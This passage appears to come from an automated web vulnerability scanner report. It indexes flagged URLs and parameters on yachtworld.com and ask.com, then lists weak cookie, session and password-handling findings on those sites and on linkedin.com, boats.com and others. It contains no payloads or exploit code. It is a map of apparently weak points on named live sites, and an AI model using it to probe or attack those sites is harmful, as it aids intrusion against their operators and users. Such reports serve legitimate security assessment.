3.293. http://www.yachtworld.com/boats/category/type/builder/ [REST URL parameter 3]

3.294. http://www.yachtworld.com/boats/category/type/builder/ [REST URL parameter 4]

3.295. http://www.yachtworld.com/boats/category/type/builder/model/United+States [REST URL parameter 6]

3.296. http://www.yachtworld.com/boats/category/type/builder/model/United+States [name of an arbitrarily supplied request parameter]

3.297. http://www.yachtworld.com/boats/category/type/builder/model/United+States/ [REST URL parameter 6]

3.298. http://www.yachtworld.com/boats/category/type/builder/model/United+States/ [name of an arbitrarily supplied request parameter]

3.299. http://www.yachtworld.com/boats/category/type/builder/model/United+States/California/1 [name of an arbitrarily supplied request parameter]

3.300. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Connecticut/1 [name of an arbitrarily supplied request parameter]

3.301. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Florida/1 [name of an arbitrarily supplied request parameter]

3.302. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Maine/1 [name of an arbitrarily supplied request parameter]

3.303. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Maryland/1 [name of an arbitrarily supplied request parameter]

3.304. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Massachusetts/1 [name of an arbitrarily supplied request parameter]

3.305. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Michigan/1 [name of an arbitrarily supplied request parameter]

3.306. http://www.yachtworld.com/boats/category/type/builder/model/United+States/New+Jersey/1 [name of an arbitrarily supplied request parameter]

3.307. http://www.yachtworld.com/boats/category/type/builder/model/United+States/New+York/1 [name of an arbitrarily supplied request parameter]

3.308. http://www.yachtworld.com/boats/category/type/builder/model/United+States/North+Carolina/1 [name of an arbitrarily supplied request parameter]

3.309. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Ohio/1 [name of an arbitrarily supplied request parameter]

3.310. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Rhode+Island/1 [name of an arbitrarily supplied request parameter]

3.311. http://www.yachtworld.com/boats/category/type/builder/model/United+States/South+Carolina/1 [name of an arbitrarily supplied request parameter]

3.312. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Texas/1 [name of an arbitrarily supplied request parameter]

3.313. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Virginia/1 [REST URL parameter 6]

3.314. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Virginia/1 [name of an arbitrarily supplied request parameter]

3.315. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Washington/1 [name of an arbitrarily supplied request parameter]

3.316. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Wisconsin/1 [REST URL parameter 6]

3.317. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Wisconsin/1 [name of an arbitrarily supplied request parameter]

3.318. http://www.yachtworld.com/clarkslanding/clarkslanding_1.cgi [hosturl parameter]

3.319. http://www.yachtworld.com/clarkslanding/clarkslanding_1.cgi [hosturl parameter]

3.320. http://www.yachtworld.com/clarkslanding/clarkslanding_2.cgi [hosturl parameter]

3.321. http://www.yachtworld.com/clarkslanding/clarkslanding_2.cgi [hosturl parameter]

3.322. http://www.yachtworld.com/clarkslanding/clarkslanding_3.cgi [hosturl parameter]

3.323. http://www.yachtworld.com/clarkslanding/clarkslanding_3.cgi [hosturl parameter]

3.324. http://www.yachtworld.com/clarkslanding/clarkslanding_3.cgi [hosturl parameter]

3.325. http://www.yachtworld.com/clarkslanding/email.cgi [office_id parameter]

3.326. http://www.yachtworld.com/core/cached/includes/css/stylesheet-intl.css [11.4-Build-105&locale parameter]

3.327. http://www.yachtworld.com/core/globalnav/emailForm.jsp [refer_page parameter]

3.328. http://www.yachtworld.com/core/globalnav/emailForm.jsp [send_to parameter]

3.329. http://www.yachtworld.com/core/listing/advancedSearch.jsp [No parameter]

3.330. http://www.yachtworld.com/core/listing/advancedSearch.jsp [fromLength parameter]

3.331. http://www.yachtworld.com/core/listing/advancedSearch.jsp [fromPrice parameter]

3.332. http://www.yachtworld.com/core/listing/advancedSearch.jsp [fromYear parameter]

3.333. http://www.yachtworld.com/core/listing/advancedSearch.jsp [man parameter]

3.334. http://www.yachtworld.com/core/listing/advancedSearch.jsp [man parameter]

3.335. http://www.yachtworld.com/core/listing/advancedSearch.jsp [name of an arbitrarily supplied request parameter]

3.336. http://www.yachtworld.com/core/listing/advancedSearch.jsp [sm parameter]

3.337. http://www.yachtworld.com/core/listing/advancedSearch.jsp [toLength parameter]

3.338. http://www.yachtworld.com/core/listing/boatMergedDetails.jsp [boat_id parameter]

3.339. http://www.yachtworld.com/core/listing/boatMergedDetails.jsp [name of an arbitrarily supplied request parameter]

3.340. http://www.yachtworld.com/core/listing/boatMergedDetails.jsp [url parameter]

3.341. http://www.yachtworld.com/core/listing/boatMergedDetails.jsp [url parameter]

3.342. http://www.yachtworld.com/core/listing/cache/dimensionValues.jsp [N parameter]

3.343. http://www.yachtworld.com/core/listing/cache/dimensionValues.jsp [Ne parameter]

3.344. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [&lineonly&&type parameter]

3.345. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [&type parameter]

3.346. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [&ywo parameter]

3.347. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [&ywo parameter]

3.348. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [hosturl parameter]

3.349. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [hosturl parameter]

3.350. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [hosturl parameter]

3.351. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [slim parameter]

3.352. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [so parameter]

3.353. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [type parameter]

3.354. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [url parameter]

3.355. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [url parameter]

3.356. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [ywo parameter]

3.357. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [ywo parameter]

3.358. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [N parameter]

3.359. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [N parameter]

3.360. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [No parameter]

3.361. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [Ntt parameter]

3.362. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [Ntt parameter]

3.363. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [Ntt parameter]

3.364. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [Ntt parameter]

3.365. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [cint parameter]

3.366. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [city parameter]

3.367. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [city parameter]

3.368. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [city parameter]

3.369. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [enid parameter]

3.370. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [fromLength parameter]

3.371. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [fromLength parameter]

3.372. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [fromYear parameter]

3.373. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [fromYear parameter]

3.374. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [fromYear parameter]

3.375. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [fromYear parameter]

3.376. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [ftid parameter]

3.377. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [hmid parameter]

3.378. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [is parameter]

3.379. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [is parameter]

3.380. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [luom parameter]

3.381. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [luom parameter]

3.382. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [luom parameter]

3.383. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [man parameter]

3.384. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [man parameter]

3.385. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [man parameter]

3.386. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [man parameter]

3.387. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [man parameter]

3.388. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [name of an arbitrarily supplied request parameter]

3.389. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [name of an arbitrarily supplied request parameter]

3.390. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [pbsint parameter]

3.391. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [resultsLayout parameter]

3.392. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [rid parameter]

3.393. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [sm parameter]

3.394. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [sm parameter]

3.395. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [toLength parameter]

3.396. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [toLength parameter]

3.397. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [toYear parameter]

3.398. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [toYear parameter]

3.399. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [type parameter]

3.400. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [type parameter]

3.401. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [type parameter]

3.402. http://www.yachtworld.com/core/listing/displayPhoto.jsp [back parameter]

3.403. http://www.yachtworld.com/core/listing/displayPhoto.jsp [boat_id parameter]

3.404. http://www.yachtworld.com/core/listing/displayPhoto.jsp [boatname parameter]

3.405. http://www.yachtworld.com/core/listing/displayPhoto.jsp [boatname parameter]

3.406. http://www.yachtworld.com/core/listing/displayPhoto.jsp [boatname parameter]

3.407. http://www.yachtworld.com/core/listing/displayPhoto.jsp [boatyr parameter]

3.408. http://www.yachtworld.com/core/listing/displayPhoto.jsp [boatyr parameter]

3.409. http://www.yachtworld.com/core/listing/displayPhoto.jsp [photo_name parameter]

3.410. http://www.yachtworld.com/core/listing/displayPhoto.jsp [photo_name parameter]

3.411. http://www.yachtworld.com/core/listing/displayPhoto.jsp [photo_name parameter]

3.412. http://www.yachtworld.com/core/listing/displayPhoto.jsp [photo_revised_date parameter]

3.413. http://www.yachtworld.com/core/listing/photoGallery.jsp [boat_id parameter]

3.414. http://www.yachtworld.com/core/listing/photoGallery.jsp [boat_id parameter]

3.415. http://www.yachtworld.com/core/listing/photoGallery.jsp [currency parameter]

3.416. http://www.yachtworld.com/core/listing/photoGallery.jsp [name of an arbitrarily supplied request parameter]

3.417. http://www.yachtworld.com/core/listing/photoGallery.jsp [units parameter]

3.418. http://www.yachtworld.com/core/listing/photo_gallery.jsp [boat_id parameter]

3.419. http://www.yachtworld.com/core/listing/photo_gallery.jsp [hosturl parameter]

3.420. http://www.yachtworld.com/core/listing/photo_gallery.jsp [hosturl parameter]

3.421. http://www.yachtworld.com/core/listing/photo_gallery.jsp [hosturl parameter]

3.422. http://www.yachtworld.com/core/listing/photo_gallery.jsp [slim parameter]

3.423. http://www.yachtworld.com/core/listing/photo_gallery.jsp [units parameter]

3.424. http://www.yachtworld.com/core/listing/photo_gallery.jsp [ywo parameter]

3.425. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [&hosturl parameter]

3.426. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [&hosturl parameter]

3.427. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [&hosturl parameter]

3.428. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [&hosturl parameter]

3.429. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [&hosturl parameter]

3.430. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [&units parameter]

3.431. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [&ywo parameter]

3.432. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [&ywo parameter]

3.433. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [&ywo parameter]

3.434. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [checked_boats parameter]

3.435. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [hosturl parameter]

3.436. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [hosturl parameter]

3.437. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [hosturl parameter]

3.438. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [hosturl parameter]

3.439. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [hosturl parameter]

3.440. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [id parameter]

3.441. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [name of an arbitrarily supplied request parameter]

3.442. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [slim parameter]

3.443. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [slim parameter]

3.444. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [slim parameter]

3.445. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [units parameter]

3.446. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [ywo parameter]

3.447. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [ywo parameter]

3.448. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [ywo parameter]

3.449. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [&ywo parameter]

3.450. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [&ywo parameter]

3.451. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [&ywo parameter]

3.452. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [hosturl parameter]

3.453. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [hosturl parameter]

3.454. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [hosturl parameter]

3.455. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [hosturl parameter]

3.456. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [hosturl parameter]

3.457. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [slim parameter]

3.458. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [slim parameter]

3.459. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [slim parameter]

3.460. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [units parameter]

3.461. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [&ywo parameter]

3.462. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [&ywo parameter]

3.463. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [hosturl parameter]

3.464. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [hosturl parameter]

3.465. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [hosturl parameter]

3.466. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [hosturl parameter]

3.467. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [hosturl parameter]

3.468. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [name of an arbitrarily supplied request parameter]

3.469. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [slim parameter]

3.470. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [slim parameter]

3.471. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [slim parameter]

3.472. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [url parameter]

3.473. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [url parameter]

3.474. http://www.yachtworld.com/core/listing/pl_display_photo.jsp [&hosturl parameter]

3.475. http://www.yachtworld.com/core/listing/pl_display_photo.jsp [&hosturl parameter]

3.476. http://www.yachtworld.com/core/listing/pl_display_photo.jsp [Regulator+32+FS&photo_name parameter]

3.477. http://www.yachtworld.com/core/listing/pl_display_photo.jsp [boat_id parameter]

3.478. http://www.yachtworld.com/core/listing/pl_display_photo.jsp [boatname parameter]

3.479. http://www.yachtworld.com/core/listing/pl_display_photo.jsp [hosturl parameter]

3.480. http://www.yachtworld.com/core/listing/pl_display_photo.jsp [hosturl parameter]

3.481. http://www.yachtworld.com/core/listing/pl_display_photo.jsp [name of an arbitrarily supplied request parameter]

3.482. http://www.yachtworld.com/core/listing/pl_display_photo.jsp [photo_name parameter]

3.483. http://www.yachtworld.com/core/listing/video_gallery.jsp [&ybw parameter]

3.484. http://www.yachtworld.com/core/listing/video_gallery.jsp [&ywo parameter]

3.485. http://www.yachtworld.com/core/listing/video_gallery.jsp [boat_id parameter]

3.486. http://www.yachtworld.com/core/listing/video_gallery.jsp [hosturl parameter]

3.487. http://www.yachtworld.com/core/listing/video_gallery.jsp [hosturl parameter]

3.488. http://www.yachtworld.com/core/listing/video_gallery.jsp [hosturl parameter]

3.489. http://www.yachtworld.com/core/rendering/email-boat.htm [boatId parameter]

3.490. http://www.yachtworld.com/core/rendering/email-boat.htm [boatUrl parameter]

3.491. http://www.yachtworld.com/core/rendering/email-boat.htm [officeId parameter]

3.492. http://www.yachtworld.com/core/rendering/email-boat.htm [officeId parameter]

3.493. http://www.yachtworld.com/core/rendering/email-boat.htm [units parameter]

3.494. http://www.yachtworld.com/core/rendering/email-boat.htm [units parameter]

3.495. http://www.yachtworld.com/core/rendering/email-boat.htm [url parameter]

3.496. http://www.yachtworld.com/core/rendering/print-boat.htm [boatId parameter]

3.497. http://www.yachtworld.com/core/rendering/print-boat.htm [officeId parameter]

3.498. http://www.yachtworld.com/core/rendering/print-boat.htm [url parameter]

3.499. http://www.yachtworld.com/core/sponsored-boats/search.htm [name of an arbitrarily supplied request parameter]

3.500. http://www.yachtworld.com/donnellyyachts/donnellyyachts_2.cgi [hosturl parameter]

3.501. http://www.yachtworld.com/donnellyyachts/donnellyyachts_2.cgi [hosturl parameter]

3.502. http://www.yachtworld.com/jarrettbay/email.cgi [office_id parameter]

3.503. http://www.yachtworld.com/jerseymarine/email.cgi [office_id parameter]

3.504. http://www.yachtworld.com/jerseymarine/jerseymarine_2.cgi [hosturl parameter]

3.505. http://www.yachtworld.com/jerseymarine/jerseymarine_2.cgi [hosturl parameter]

3.506. http://www.yachtworld.com/leaving_yw.cgi [url parameter]

3.507. http://www.yachtworld.com/leaving_yw.cgi [url parameter]

3.508. http://www.yachtworld.com/legendary/email.cgi [office_id parameter]

3.509. http://www.yachtworld.com/marinemaxcarolinas/email.cgi [office_id parameter]

3.510. http://www.yachtworld.com/marinemaxcarolinas/marinemaxcarolinas_2.cgi [hosturl parameter]

3.511. http://www.yachtworld.com/marinemaxcarolinas/marinemaxcarolinas_2.cgi [hosturl parameter]

3.512. http://www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp [currencyid parameter]

3.513. http://www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp [slim parameter]

3.514. http://www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp [sm parameter]

3.515. http://www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp [so parameter]

3.516. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [slim parameter]

3.517. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [slim parameter]

3.518. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [slim parameter]

3.519. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [units parameter]

3.520. http://www.yachtworld.com/southpaw/email.cgi [office_id parameter]

3.521. http://www.yachtworld.com/southpaw/southpaw_1.cgi [hosturl parameter]

3.522. http://www.yachtworld.com/southpaw/southpaw_1.cgi [hosturl parameter]

3.523. http://www.yachtworld.com/starlingmarine/email.cgi [office_id parameter]

3.524. http://www.yachtworld.com/starlingmarine/starlingmarine_1.cgi [hosturl parameter]

3.525. http://www.yachtworld.com/starlingmarine/starlingmarine_1.cgi [hosturl parameter]

3.526. https://www.yachtworld.com/core/cached/includes/css/stylesheet-intl.css [11.4-Build-105&locale parameter]

3.527. https://www.yachtworld.com/core/globalnav/emailForm.jsp [refer_page parameter]

3.528. https://www.yachtworld.com/core/globalnav/emailForm.jsp [send_to parameter]

3.529. https://www.yachtworld.com/core/listing/advancedSearch.jsp [name of an arbitrarily supplied request parameter]

3.530. https://www.yachtworld.com/core/listing/cache/searchResults.jsp [N parameter]

3.531. https://www.yachtworld.com/core/listing/cache/searchResults.jsp [enid parameter]

3.532. https://www.yachtworld.com/core/listing/cache/searchResults.jsp [ftid parameter]

3.533. https://www.yachtworld.com/core/listing/cache/searchResults.jsp [hmid parameter]

3.534. https://www.yachtworld.com/core/listing/cache/searchResults.jsp [name of an arbitrarily supplied request parameter]

3.535. https://www.yachtworld.com/core/listing/cache/searchResults.jsp [sm parameter]

3.536. https://www.yachtworld.com/leaving_yw.cgi [url parameter]

3.537. https://www.yachtworld.com/leaving_yw.cgi [url parameter]

3.538. http://www.yachtworld.com/leaving_yw.cgi [Referer HTTP header]

3.539. https://www.yachtworld.com/leaving_yw.cgi [Referer HTTP header]

3.540. http://www.ask.com/ [wz_uid cookie]

3.541. http://www.ask.com/about [user cookie]

3.542. http://www.ask.com/about [wz_sid cookie]

3.543. http://www.ask.com/about [wz_uid cookie]

3.544. http://www.ask.com/about/legal/privacy [wz_sid cookie]

3.545. http://www.ask.com/about/legal/privacy [wz_uid cookie]

3.546. http://www.ask.com/about/legal/terms [wz_sid cookie]

3.547. http://www.ask.com/about/legal/terms [wz_uid cookie]

3.548. http://www.ask.com/advertise [wz_sid cookie]

3.549. http://www.ask.com/advertise [wz_uid cookie]

3.550. http://www.ask.com/ans [wz_uid cookie]

3.551. http://www.ask.com/answers [wz_sid cookie]

3.552. http://www.ask.com/answers [wz_uid cookie]

3.553. http://www.ask.com/answers/000/Notification [wz_sid cookie]

3.554. http://www.ask.com/answers/000/Notification [wz_uid cookie]

3.555. http://www.ask.com/blogsearch [wz_uid cookie]

3.556. http://www.ask.com/homepage [wz_uid cookie]

3.557. http://www.ask.com/jsignin [wz_sid cookie]

3.558. http://www.ask.com/jsignin [wz_uid cookie]

3.559. http://www.ask.com/more [wz_uid cookie]

3.560. http://www.ask.com/pictures [user cookie]

3.561. http://www.ask.com/pictures [wz_sid cookie]

3.562. http://www.ask.com/pictures [wz_sid cookie]

3.563. http://www.ask.com/pictures [wz_uid cookie]

3.564. http://www.ask.com/pictures [wz_uid cookie]

3.565. http://www.ask.com/pictureslanding [user cookie]

3.566. http://www.ask.com/pictureslanding [wz_sid cookie]

3.567. http://www.ask.com/pictureslanding [wz_uid cookie]

3.568. http://www.ask.com/questionoftheday [wz_sid cookie]

3.569. http://www.ask.com/questionoftheday [wz_uid cookie]

3.570. http://www.ask.com/settings [wz_sid cookie]

3.571. http://www.ask.com/settings [wz_uid cookie]

3.572. http://www.ask.com/video [wz_uid cookie]

3.573. http://www.ask.com/videos [wz_sid cookie]

3.574. http://www.ask.com/videos [wz_uid cookie]

3.575. http://www.ask.com/web [wz_sid cookie]

3.576. http://www.ask.com/web [wz_uid cookie]

3.577. http://www.ask.com/web [wz_uid cookie]

3.578. http://www.ask.com/web [wz_uid cookie]

4. Cleartext submission of password

4.1. http://malsup.com/jquery/form/

4.2. http://malsup.com/jquery/form/

4.3. http://malsup.com/jquery/form/

4.4. http://malsup.com/jquery/form/

4.5. http://malsup.com/jquery/form/

4.6. http://malsup.com/jquery/form/

4.7. http://www.ask.com/ja-ask-dialog

4.8. http://www.ask.com/jsignin

4.9. http://www.ask.com/settings

4.10. http://www.dynamicdrive.com/forums/showthread.php

4.11. http://www.reel-time.com/forum/showthread.php

5. SSL cookie without secure flag set

5.1. https://www.linkedin.com/secure/login

5.2. https://www.yachtworld.com/boat-loans/index.jsp

5.3. https://www.yachtworld.com/

5.4. https://www.yachtworld.com/boat-loans/consumer_loan_processing.html

5.5. https://www.yachtworld.com/boat-loans/forgot_password.jsp

5.6. https://www.yachtworld.com/boat-loans/myLoan.jsp

6. Session token in URL

6.1. http://www.ask.com/ans

6.2. http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html

7. Password field submitted using GET method

7.1. http://www.ask.com/ja-ask-dialog

7.2. http://www.ask.com/ja-ask-dialog

7.3. http://www.ask.com/settings

8. Cookie scoped to parent domain

8.1. http://www.boats.com/boat-transport/index.jsp

8.2. http://www.boats.com/boat-transport/index.jsp

8.3. http://www.boats.com/includes/script_declarations.jsp

8.4. http://ads.pointroll.com/PortalServe/

8.5. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s44969984570052

8.6. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s48372025459539

8.7. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s59107670621015

8.8. http://www.ask.com/

8.9. http://www.ask.com/

8.10. http://www.ask.com/about

8.11. http://www.ask.com/about/legal/privacy

8.12. http://www.ask.com/about/legal/terms

8.13. http://www.ask.com/advertise

8.14. http://www.ask.com/ans

8.15. http://www.ask.com/answers

8.16. http://www.ask.com/answers/000/Notification

8.17. http://www.ask.com/homepage

8.18. http://www.ask.com/ja-ask-dialog

8.19. http://www.ask.com/pictures

8.20. http://www.ask.com/pictureslanding

8.21. http://www.ask.com/questionoftheday

8.22. http://www.ask.com/settings

8.23. http://www.ask.com/skins

8.24. http://www.ask.com/videos

8.25. http://www.ask.com/web

8.26. http://www.ask.com/webadvanced

8.27. https://www.linkedin.com/secure/login

8.28. http://www.reel-time.com/forum/showthread.php

8.29. http://wzus1.ask.com/i/i.gif

9. Cookie without HttpOnly flag set

9.1. http://www.boats.com/boat-transport/index.jsp

9.2. http://www.boats.com/boat-transport/index.jsp

9.3. http://www.boats.com/includes/script_declarations.jsp

9.4. http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html

9.5. https://www.linkedin.com/secure/login

9.6. http://www.yachtworld.com/boat-loans/finance/help_boatsbank.jsp

9.7. http://www.yachtworld.com/boat-loans/finance/rates.jsp

9.8. http://www.yachtworld.com/boat-loans/finance/what_to_expect.jsp

9.9. http://www.yachtworld.com/boat-loans/index.jsp

9.10. http://www.yachtworld.com/boat-loans/partner_program.jsp

9.11. https://www.yachtworld.com/boat-loans/consumer_loan_processing.html

9.12. https://www.yachtworld.com/boat-loans/forgot_password.jsp

9.13. https://www.yachtworld.com/boat-loans/index.jsp

9.14. https://www.yachtworld.com/boat-loans/myLoan.jsp

9.15. http://ads.pointroll.com/PortalServe/

9.16. http://govguru.com/north-carolina/boat-registration

9.17. http://hire.jobvite.com/CompanyJobs/Careers.aspx

9.18. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s44969984570052

9.19. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s48372025459539

9.20. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s59107670621015

9.21. http://www.ask.com/

9.22. http://www.ask.com/

9.23. http://www.ask.com/about

9.24. http://www.ask.com/about/legal/privacy

9.25. http://www.ask.com/about/legal/terms

9.26. http://www.ask.com/advertise

9.27. http://www.ask.com/ans

9.28. http://www.ask.com/answers

9.29. http://www.ask.com/answers/000/Notification

9.30. http://www.ask.com/homepage

9.31. http://www.ask.com/ja-ask-dialog

9.32. http://www.ask.com/pictures

9.33. http://www.ask.com/pictureslanding

9.34. http://www.ask.com/questionoftheday

9.35. http://www.ask.com/settings

9.36. http://www.ask.com/skins

9.37. http://www.ask.com/videos

9.38. http://www.ask.com/web

9.39. http://www.ask.com/webadvanced

9.40. http://www.boatxchange.com/openx/www/delivery/ajs.php

9.41. http://www.boatxchange.com/openx/www/delivery/lg.php

9.42. http://www.dynamicdrive.com/forums/showthread.php

9.43. http://www.reel-time.com/forum/showthread.php

9.44. http://www.yachtworld.com/

9.45. http://www.yachtworld.com/

9.46. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States

9.47. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States

9.48. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States

9.49. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico

9.50. http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States

9.51. http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States

9.52. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States

9.53. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States

9.54. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States

9.55. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States

9.56. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States

9.57. http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States

9.58. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States

9.59. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States

9.60. http://www.yachtworld.com/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States

